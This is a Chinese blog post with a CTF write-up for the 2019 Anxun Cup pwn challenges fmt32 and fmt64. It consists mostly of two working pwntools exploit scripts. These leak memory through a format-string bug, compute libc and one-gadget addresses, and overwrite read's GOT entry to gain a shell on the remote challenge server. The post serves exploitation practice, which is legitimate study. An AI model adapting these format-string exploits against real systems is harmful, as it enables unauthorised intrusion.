安洵杯2019

  1. 安洵杯2019
    1. fmt32
    2. fmt64

安洵杯2019

fmt32

fmt leak binary, leak libc got, modify read’s got

from pwn import * 
import plus_fmt as pft
start_addr=0x8048000
end_addr=0x804a000
p=remote('47.108.135.45',10001)


def leak(addr):
    p.recvuntil('Please tell me:')
    payload='%10$s'+'OOOO'+p32(addr)
    p.sendline(payload)
    p.recvuntil('Repeater:')
    data=p.recvuntil('OOOO',True)
    data+='\x00'
    return data

def binary_get():

    f=open('pwnelf','w')
    f2=open('pwnelf2','w')

    cur_addr = start_addr
    while cur_addr<=end_addr:
        data = leak(cur_addr)
        log.success('{} =>{}'.format(hex(cur_addr), repr(data)))
        cur_addr += len(data)
        if f2.closed==False:
            f2.write(data)
        if cur_addr>start_addr+0x500:
            f2.close()
        f.write(data)
    f.close()

puts_got=0x804A01C
read_got=0x804A010
printf_got=0x804A014
stderr_got=0x804A040
payload='%10$s'+'OOOO'+p32(puts_got)
p.sendline(payload)
p.recvuntil('Repeater:')
puts_so=u32(p.recvn(4))
print(hex(puts_so))
libc_base=puts_so-0x5f140
one=libc_base+0x3a80c
print(hex(libc_base))
system=0x03a940+libc_base

payload='%10$s'+'OOOO'+p32(stderr_got)
p.sendline(payload)
p.recvuntil('Repeater:')
stderr_so=u32(p.recvn(4))
print(hex(stderr_so),hex(one))

log.success('one:%#x,stderr:%#x'%(one,stderr_so))


tag = {read_got:one} #printf->one

# payload = pft. new_fmtstr_payload(8, tag, bits=32, write_size='short')
# #payload='%34819c%17$hn%28622c%18$hnaa\x10\xa0\x04\x08\x12\xa0\x04\x08'
# #one:0xf7de480c
# p.sendline(payload)

low=one&0xffff
low-=9
high=one>>16
log.success('high:%#x,low:%#x'%(high,low))
str_low=str(low)
str_high=str(high)
offset=15
payload=''
payload += '%'+str_low+'c%'+str(offset)+'$hn'
payload += '%'+str(high-low-9)+'c%'+str(offset+1)+'$hn'

align=((4-len(payload)%4)+1)
payload+='a'*align
print(len(payload))

payload += p32(read_got)+p32(read_got+2)

p.sendline(payload)
# print(repr(payload))
# p.recvuntil('Repeater:')


# payload='%10$s'+'OOOO'+p32(stderr_got)
# p.sendline(payload)
# p.recvuntil('Repeater:')
# stderr_so=u32(p.recvn(4))
# print(hex(stderr_so),hex(one))



p.interactive()

fmt64

leak速度很慢,利用给的 readelf -s fmt64 ,计算ELF的read GOT,改got,pwntools fmt 打不了。手写一个fmt。

from pwn import * 
import plus_fmt as pft
p=remote('47.108.135.45',20176)


# payload='%9$ppppp'+'a'*0x8
# p.sendline(payload)
# p.interactive()

start_addr=0x400000
end_addr=start_addr+0xf00
f=open('elf','w')

def leak(addr):
    p.recvuntil('Please tell me:')
    payload='%9$s'+'OOOO'+p64(addr)
    p.sendline(payload)
    p.recvuntil('Repeater:')
    data=p.recvuntil('OOOO',True)
    data+='\x00'
    return data


def binary_get():
    cur_addr = start_addr
    while cur_addr<=end_addr:
        data = leak(cur_addr)
        log.success('{} =>{}'.format(hex(cur_addr), repr(data)))
        cur_addr += len(data)
        f.write(data)
    f.close()

#binary_get()

got_base=0x601018
puts_got=got_base
read_got=got_base+6*8
stderr_got=0x6010a0
strlen_got=got_base+8


p.recvuntil('Please tell me:')
payload='%9$s'+'OOOO'+p64(puts_got)
p.sendline(payload)
p.recvuntil('Repeater:')
puts_so=u64(p.recvn(6).ljust(8,'\x00'))
libc_base=puts_so-0x06f690
one=0xf1147+libc_base
system=libc_base+0x45390
log.success('libc_base ==> %#x,one ==> %#x'%(libc_base,one))

tag=[read_got,one]

prew=9
by=[]
one2=one
offset=17

#tag={stderr_got:one}
#payload = pft. new_fmtstr_payload(8, tag, numbwritten=0,bits=64, write_size='short')

for i in range(6):
    by.append(one2&0xff)
    one2>>=8
print(by)

payload = ''

for i in range(6):
    payload += '%'
    cnt=(0x100+by[i]-(prew%0x100))%0x100
    payload +=str(cnt)
    payload+='c%'+str(offset+i)+'$hhn'
    prew+=cnt

payload += 'a'*(8-len(payload)%8)
log.success('payload ==> %s,%d'%(repr(payload),len(payload)))
if(len(payload)==64):
    print('abort')
    exit(0)

for i in range(6):
    payload+=p64(tag[0]+i)
log.success('payload ==> %s,%d'%(repr(payload),len(payload)))

p.send(payload)


# p.recvuntil('Repeater:')

# payload='%9$s'+'OOOO'+p64(read_got)
# p.sendline(payload)
# p.recvuntil('Repeater:')
# stderr_so=u64(p.recvn(6).ljust(8,'\x00'))
# log.success('stderrgot ==> %#x',stderr_so)

p.interactive()

转载请注明来源,欢迎对文章中的引用来源进行考证,欢迎指出任何有错误或不够清晰的表达。可以在下面评论区评论。

文章标题:安洵杯2019

本文作者:枫云李

发布时间:2019-11-30, 00:00:00

最后更新:2020-04-11, 01:24:25

原始链接:https://primelyw.github.io/2019/11/30/%E5%AE%89%E6%B4%B5%E6%9D%AF2019/

版权声明: "署名-非商用-相同方式共享 4.0" 转载请保留原文链接及作者。

目录
github